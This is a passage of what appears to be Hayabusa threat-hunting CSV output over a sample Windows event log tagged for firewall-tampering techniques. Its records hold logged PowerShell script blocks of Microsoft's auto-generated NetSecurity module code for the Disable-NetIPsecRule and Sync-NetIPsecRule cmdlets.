'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper 